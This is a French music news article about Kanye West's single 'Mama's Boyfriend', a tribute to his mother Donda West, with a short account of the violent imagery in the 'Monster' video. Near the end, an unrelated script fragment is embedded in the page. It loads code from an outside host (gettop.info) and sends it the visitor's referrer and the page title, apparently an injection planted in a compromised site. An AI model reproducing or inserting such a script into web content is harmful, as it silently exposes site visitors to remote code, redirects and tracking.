Kanye West : Rend hommage à sa mère


Facebooktwitterredditpinterestlinkedinmail

Avec « Mama’s Boyfriend », Kanye West propose aux internautes de retrouver un moment d’intimité assez fort. Ce nouveau single, finalement non inclus sur le nouvel album du rappeur, « My Dark Beautiful Twisted Fantasy », revient sur la jeunesse du rappeur : il y parle des hommes qui s’intéressent à sa mère et tente de tout faire pour la protéger. Devenu adulte, il se rend compte qu’il ne vaut pas mieux que ces hommes qu’ils critiquaient tant. L’artiste rend hommage dans ce titre à sa mère, Donda West, disparue en 2007.

Quelques jours avant de dévoiler « Mama’s Boyfriend », Kanye West avait créé le buzz avec le clip de son single « Monster ». En effet, le rappeur américain est mis en scène entouré de femmes décédées et exécutées par ses soins. Le clip met aussi en avant de jeunes femmes pendues, ou encore un homme dont les entrailles sont dévorées par des vampires. Jay-Z, Rick Ross et Nicki Minaj, en featuring sur ce morceau, sont eux aussi entourés de cadavres. Conscient des critiques qu’il peut susciter, Kanye West précise au début de son clip que toutes les scènes ne comportent aucun caractère misogyne.

Site Officiel Kanye West

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous Die Mannequin : French Canadian Tour
Next Avenged Sevenfold : Confirmé pour le festival d'été

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *